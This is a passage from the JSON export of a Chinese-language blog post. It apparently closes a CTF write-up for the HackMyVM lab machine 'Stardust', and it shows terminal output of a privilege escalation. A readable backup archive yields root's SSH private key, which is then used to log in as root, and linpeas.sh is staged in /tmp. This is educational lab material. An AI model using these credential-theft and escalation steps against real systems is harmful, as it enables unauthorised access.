dpkg.statoverride.0\n-rw-r--r--  1 root root    161 May  4  2023 dpkg.statoverride.1.gz\n-rw-r--r--  1 root root    161 May  4  2023 dpkg.statoverride.2.gz\n-rw-r--r--  1 root root    161 May  4  2023 dpkg.statoverride.3.gz\n-rw-r--r--  1 root root    142 May  4  2023 dpkg.statoverride.4.gz\n-rw-r--r--  1 root root    120 Feb  6  2023 dpkg.statoverride.5.gz\n-rw-r--r--  1 root root 433695 May  7  2023 dpkg.status.0\n-rw-r--r--  1 root root 118269 May  6  2023 dpkg.status.1.gz\n-rw-r--r--  1 root root 117940 May  5  2023 dpkg.status.2.gz\n-rw-r--r--  1 root root 117009 May  4  2023 dpkg.status.3.gz\n-rw-r--r--  1 root root 111453 May  4  2023 dpkg.status.4.gz\n-rw-r--r--  1 root root  91220 Feb  6  2023 dpkg.status.5.gz\ntally@stardust:\/var\/backups$ mv backup.tar \/tmp\/\nmv: cannot move &#039;backup.tar&#039; to &#039;\/tmp\/backup.tar&#039;: Permission denied\ntally@stardust:\/var\/backups$ cp backup.tar \/tmp\/backup.tar\ntally@stardust:\/var\/backups$ cd \/tmp\ntally@stardust:\/tmp$ tar -zxvf backup.tar\n\ngzip: stdin: not in gzip format\ntar: Child returned status 1\ntar: Error is not recoverable: exiting now\ntally@stardust:\/tmp$ ls\nbackup.tar\nlinpeas.sh\nsystemd-private-a468ae0b82214e6eb393a273f2b41b27-apache2.service-4Lf4Vi\nsystemd-private-a468ae0b82214e6eb393a273f2b41b27-systemd-logind.service-mZOrlh\nsystemd-private-a468ae0b82214e6eb393a273f2b41b27-systemd-timesyncd.service-e18fOg\ntally@stardust:\/tmp$ tar -xf backup.tar \ntally@stardust:\/tmp$ ls -la\ntotal 948\ndrwxrwxrwt 13 root  root    4096 Apr 28 18:14 .\ndrwxr-xr-x 18 root  root    4096 May  5  2023 ..\n-rw-r--r--  1 tally tally  51200 Apr 28 18:13 backup.tar\ndrwxrwxrwt  2 root  root    4096 Apr 28 17:30 .font-unix\ndrwxr-xr-x  3 tally tally   4096 Apr 28 18:14 home\ndrwxrwxrwt  2 root  root    4096 Apr 28 17:30 .ICE-unix\n-rwxr-xr-x  1 tally tally 860549 Mar 25 16:56 linpeas.sh\ndrwx------  4 tally tally   4096 May  8  2023 root\ndrwx------  3 root  root    4096 Apr 28 17:30 systemd-private-a468ae0b82214e6eb393a273f2b41b27-apache2.service-4Lf4Vi\ndrwx------  3 root  root    4096 Apr 28 17:30 systemd-private-a468ae0b82214e6eb393a273f2b41b27-systemd-logind.service-mZOrlh\ndrwx------  3 root  root    4096 Apr 28 17:30 systemd-private-a468ae0b82214e6eb393a273f2b41b27-systemd-timesyncd.service-e18fOg\ndrwxrwxrwt  2 root  root    4096 Apr 28 17:30 .Test-unix\ndrwxr-xr-x  3 tally tally   4096 Apr 28 18:14 var\ndrwxrwxrwt  2 root  root    4096 Apr 28 17:30 .X11-unix\ndrwxrwxrwt  2 root  root    4096 Apr 28 17:30 .XIM-unix\ntally@stardust:\/tmp$ cd home\ntally@stardust:\/tmp\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 tally tally 4096 Apr 28 18:14 .\ndrwxrwxrwt 13 root  root  4096 Apr 28 18:14 ..\ndrwxr-xr-x  4 tally tally 4096 Apr 28 18:08 tally\ntally@stardust:\/tmp\/home$ cd ..\/root\ntally@stardust:\/tmp\/root$ ls -la\ntotal 32\ndrwx------  4 tally tally 4096 May  8  2023 .\ndrwxrwxrwt 13 root  root  4096 Apr 28 18:14 ..\n-rw-------  1 tally tally  359 May  8  2023 .bash_history\n-rw-r--r--  1 tally tally  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  3 tally tally 4096 Feb  6  2023 .local\n-rw-r--r--  1 tally tally  161 Jul  9  2019 .profile\n-rwx------  1 tally tally   33 Feb  6  2023 root.txt\ndrwx------  2 tally tally 4096 May  7  2023 .ssh\ntally@stardust:\/tmp\/root$ cat root.txt \n052cf26a6e7e33790391c0d869e2e40c\ntally@stardust:\/tmp\/root$ cd .ssh\ntally@stardust:\/tmp\/root\/.ssh$ ls -la\ntotal 16\ndrwx------ 2 tally tally 4096 May  7  2023 .\ndrwx------ 4 tally tally 4096 May  8  2023 ..\n-rw-r--r-- 1 tally tally  571 May  7  2023 authorized_keys\n-rw------- 1 tally tally 2602 May  7  2023 id_rsa\ntally@stardust:\/tmp\/root\/.ssh$ chmod 600 id_rsa \ntally@stardust:\/tmp\/root\/.ssh$ ssh root@0.0.0.0 -i  id_rsa \nThe authenticity of host &#039;0.0.0.0 (0.0.0.0)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:+ckLANZQ\/YnjlcBKT4ZXwxBF3IjkBDvZ9IaPV+AOa7U.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;0.0.0.0&#039; (ECDSA) to the list of known hosts.\nLinux stardust.hmv 5.10.0-22-amd64 #1 SMP Debian 5.10.178-3 (2023-04-22) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@stardust:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@stardust:~# :)<\/code><\/pre>\n<p>\u62ff\u4e0brootshell\uff01\uff01\uff01\uff01<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1dj421d7AF\/\">https:\/\/www.bilibili.com\/video\/BV1dj421d7AF\/<\/a><\/p>\n<p><a href=\"https:\/\/jzcheng.notion.site\/Stardust-734c1e52b5764e4f8edd82311549e85c?pvs=4\">https:\/\/jzcheng.notion.site\/Stardust-734c1e52b5764e4f8edd82311549e85c?pvs=4<\/a><\/p>\n<p><a href=\"https:\/\/youtu.be\/uAXdjkBIk1Y\">https:\/\/youtu.be\/uAXdjkBIk1Y<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Stardust \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/stardust] \u2514\u2500$ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-657","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/657","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=657"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/657\/revisions"}],"predecessor-version":[{"id":658,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/657\/revisions\/658"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=657"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=657"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=657"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}